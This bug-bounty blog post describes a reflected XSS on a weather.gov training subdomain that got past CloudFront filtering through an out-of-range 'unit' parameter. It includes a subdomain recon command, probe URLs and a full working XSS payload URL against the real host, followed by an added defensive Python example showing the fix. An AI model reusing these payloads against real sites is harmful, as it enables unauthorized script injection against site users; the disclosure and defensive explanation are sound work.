Bypassed the Amazon CloudFront Logic and got XSS at the National Weather Agency of the U.S.

Prince Roy(RoyzSec)
3 min read · Apr 11, 2024


Har Har Mahadev🔱. This is Prince Roy, a security researcher also known as RoyzSec. Back again with another blog about how I was able to bypass the Amazon CloudFront firewall’s logic and get XSS [cross-site scripting]. Are you guys excited to know how I did it?

So, at first, I collected all the live subdomains of weather.gov via Subfinder and HTTPX.

subfinder -d weather.gov -all | httpx -mc 200 | tee weather_live.txt

I barely remember finding this XSS in the 9th or 10th subdomain. I lost that source code; otherwise, I could explain very easily what the logical error was in their CloudFront setting.

That was the domain [training.weather.gov]. I found a GET-based reflected XSS on this page. Reading the source, they simply used a loop that displays the PCU pages for units 1–6. When I requested:

https://training.weather.gov/pds/climate/index.php?unit=7

I found nothing on that page.

Then I tried SQL injection, but that didn’t work, because they are using Amazon CloudFront.

Moreover, I also tried :

https://training.weather.gov/pds/climate/index.php?unit=1%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=2%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=6%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=7%22%3EHello

Up to ?unit=6 the request was blocked by Amazon CloudFront. But whenever I put unit=7, it bypassed that logic and the input was reflected on the page.

I was shocked to see that, because it was unexpected; it was just a logical error. Then I put in the XSS payload, and guess what?

https://training.weather.gov/pds/climate/index.php?unit=7%27%22%3E%3CSvg%20Only=1%20OnLoad=confirm(atob(%22WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw==%22))%3E&tab=FUZZ
BOOM!!!

Boom! Got XSS. It was just a logical error: the developer made a mistake in the logic that retrieves the data from the database, so an unknown unit value was echoed back unescaped. After 4 days they accepted my report as valid.
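To make the logic error concrete from the defender’s side, here is an added example (my own reconstruction, not the real training.weather.gov code, and nothing from the original post). It assumes the shape the post describes: units 1–6 are known, and an unknown unit value fell into a fallback branch that reflected the raw query parameter into the HTML. The vulnerable function shows that pattern; the hardened one validates `unit` against an allowlist before rendering and HTML-escapes anything that is echoed, so the fix does not depend on an edge WAF catching the payload. Unit titles are constructed sample data.

```python
import html
from typing import Optional

# Constructed sample data: the application knows exactly six unit pages.
# (Assumption based on the post's description of a loop over units 1-6.)
UNIT_TITLES = {n: f"Climate Unit {n}" for n in range(1, 7)}


def render_unit_page_vulnerable(unit_param: str) -> str:
    """Hypothetical reconstruction of the bug: known units render from the
    table, anything else is echoed back unescaped in a fallback message."""
    if unit_param.isdigit() and int(unit_param) in UNIT_TITLES:
        return f"<h1>{UNIT_TITLES[int(unit_param)]}</h1>"
    # The defect: raw user input lands in the HTML response body.
    return f"<p>No content for unit={unit_param}</p>"


def parse_unit(unit_param: Optional[str]) -> Optional[int]:
    """Allowlist validation: accept only an integer that names a known unit.
    Returns None for missing, non-numeric or out-of-range values."""
    if unit_param is None:
        return None
    try:
        n = int(unit_param)
    except ValueError:
        return None
    return n if n in UNIT_TITLES else None


def render_unit_page_hardened(unit_param: Optional[str]) -> str:
    """Validate first; if the value is still shown to the user, escape it
    (quote=True also escapes double quotes, which the post's payload relied on
    to break out of an attribute)."""
    unit = parse_unit(unit_param)
    if unit is None:
        shown = html.escape(unit_param or "", quote=True)
        return f"<p>Unknown unit: {shown}</p>"
    return f"<h1>{html.escape(UNIT_TITLES[unit])}</h1>"


if __name__ == "__main__":
    # Constructed input: a non-numeric value carrying markup, like the
    # out-of-range unit=7 case in the post but with a harmless tag.
    probe = '7"><b>x</b>'
    print(render_unit_page_vulnerable(probe))  # markup survives: reflected XSS
    print(render_unit_page_hardened(probe))    # markup is neutralised
```

The detection angle is the same as the fix: any response branch that interpolates a request parameter without going through `html.escape` (or the templating engine’s auto-escaping) is the place to look, regardless of whether a WAF sits in front of it.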

Finally, thanks for reading my small blog. If you like this, please share it with your friends and press the clap button for me, which inspires me a lot.

Please follow my social media platforms:

Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/

Github: https://github.com/royzsec

Twitter: https://twitter.com/royzsec
